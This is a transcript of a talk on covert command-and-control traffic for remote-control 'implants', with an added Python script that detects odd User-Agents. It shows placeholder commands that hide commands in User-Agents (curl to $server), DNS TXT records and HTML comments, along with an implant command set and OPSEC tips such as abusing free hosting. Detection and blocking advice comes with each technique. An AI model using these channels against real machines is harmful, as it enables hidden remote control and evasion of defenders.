
Beneath the Radar: covert traffic on the web

Methods to conceal network traffic that you might not want to be recognized over the wire.

Useful for software updates, remote control, or license checks.

Benjamin Scott

March 25, 2014
Transcript

  1. The Basics
     What do we want? Remote control of a machine via an "implant" process.
     How do we get it? Send commands over the network and get responses.

  2. Enter the Arena
     DNS & Routing. IP + Port = Socket.
     Diagram: Source -> Gateway & Firewall -> Destination.
     Local processes on the source: Implant, Antivirus (each with its own socket).

  3. Types of Secrecy
     Encryption = I see data but cannot make sense of it.
     Covert channel = I have no idea what to look for.
     (Both from the point of view of the observer, i.e. a man in the middle.)

  4. Talking Back
     • Direct = connect to the control server
       ◦ Negotiation-based, low latency
       ◦ Good for live interaction
       ◦ e.g. TCP, SSH, RDP
     • Indirect = connect to an intermediate server
       ◦ Stealthy, high latency
       ◦ Good for asynchronous commands / responses
       ◦ e.g. P2P, social media posts, HTML comments

  5. What are we sending?
     • Implant
       ◦ Info about the host
       ◦ Unique ID
     • Server
       ◦ Commands
       ◦ Configuration details
     Example host record: Jimbob Jones | 655321 | Admin | WinXP | 10.1.0.1

  6. Common Commands
     Heartbeat = Are you still there?
     Get_Summary = Give me your information.
     Start_Interaction = I want a command session.
     Transfer_File = Send a particular file.
     Execute_Command = Run it and send the results.

  7. Filtering Methods
     • Source:
       ◦ Antivirus = prevent connections from a process
       ◦ Firewall = IP + port access lists
     • Gateway, Routing:
       ◦ DNS sinkhole = blacklist suspicious domains
       ◦ IDS = drop connections carrying scary data
       ◦ Protocol filtering = inspect packets

  8. UserAgent (direct)
     Implant generates a UA containing command codes; the server parses it and replies.
       curl $server -A "AppleWebKit/531.($command)"
     Detection: look for uncommon UserAgents.
     Blocking: use a web proxy to standardize outgoing UAs (e.g. fake_user_agent in squid).
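As an added example (not from the deck), the following Python script applies slide 8's detection advice to constructed Apache-style proxy log lines: it flags User-Agents that only a single client sends, and clients whose User-Agent changes only in its digits between requests, which is what a command code embedded in the version number looks like on the wire. The log format and all sample hosts and values are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample proxy log (Apache "combined" format), not from the deck.
# Three clients share a normal browser UA; 10.1.0.1 also sends two bare
# "AppleWebKit/531.<number>" UAs, the shape the slide's curl command produces.
SAMPLE_LOG = """\
10.1.0.1 - - [25/Mar/2014:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36"
10.1.0.2 - - [25/Mar/2014:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36"
10.1.0.3 - - [25/Mar/2014:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36"
10.1.0.1 - - [25/Mar/2014:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "AppleWebKit/531.42"
10.1.0.1 - - [25/Mar/2014:10:00:09 +0000] "GET / HTTP/1.1" 200 512 "-" "AppleWebKit/531.17"
"""

# host ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse(log_text):
    """Yield (client_host, user_agent) for every well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("host"), m.group("ua")

def rare_user_agents(log_text, max_hosts=1):
    """UAs sent by at most max_hosts distinct clients -> {ua: [hosts]}.
    A UA the rest of the fleet never sends is the slide's 'uncommon UserAgent'."""
    hosts_by_ua = defaultdict(set)
    for host, ua in parse(log_text):
        hosts_by_ua[ua].add(host)
    return {ua: sorted(h) for ua, h in hosts_by_ua.items() if len(h) <= max_hosts}

def churning_user_agents(log_text):
    """Per client, count distinct UA strings that differ only in their digits.
    A browser keeps one version string; a UA whose numbers change between
    requests is carrying data. Returns {(host, digit-stripped ua): variants}."""
    variants = defaultdict(set)
    for host, ua in parse(log_text):
        variants[(host, re.sub(r"\d+", "", ua))].add(ua)
    return {key: len(uas) for key, uas in variants.items() if len(uas) > 1}

if __name__ == "__main__":
    print("rare UAs:", rare_user_agents(SAMPLE_LOG))
    print("churning UAs:", churning_user_agents(SAMPLE_LOG))
```

On a real fleet, raise max_hosts to a small fraction of the client population and run the digit-skeleton check per client over a day's logs; a single odd UA is noise, a client cycling through dozens of variants of one skeleton is the pattern to investigate.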
  9. DNS TXT records (indirect)
     Server publishes the command in a nameserver TXT record; the implant parses the TXT record for the domain.
       dig $domain txt
     Detection: log DNS queries and investigate odd ones.
     Blocking: run your own DNS, never ask for authoritative records, only cache from trusted sources.

  10. HTML comments (indirect)
     Server encodes commands in comments; the implant parses them from between markers.
       <!-- marker $command marker -->
     Detection: very difficult.
     Blocking: use a web proxy to filter incoming comments (e.g. ProxyHTMLStripComments On in squid).

  11. Implant Development
     Choose the platform / language to support.
     Cache data locally.
     Use dynamic reconfiguration.
     Have a strict build process to strip debug info.

  12. Server Maintenance
     • Taking action
       ◦ alerting on interesting events
       ◦ parsing collected data
     • Storage and backup
       ◦ common interface and DB backend
       ◦ log rolling & archival
     • Scaling
       ◦ patching
       ◦ rolling infrastructure

  13. OPSEC Considerations
     • Technical protection
       ◦ Public key crypto and disk encryption
       ◦ Proxies / Tor relays
     • Stay under the radar
       ◦ Keep people from spidering your server
       ◦ Abuse free hosting and open-source implants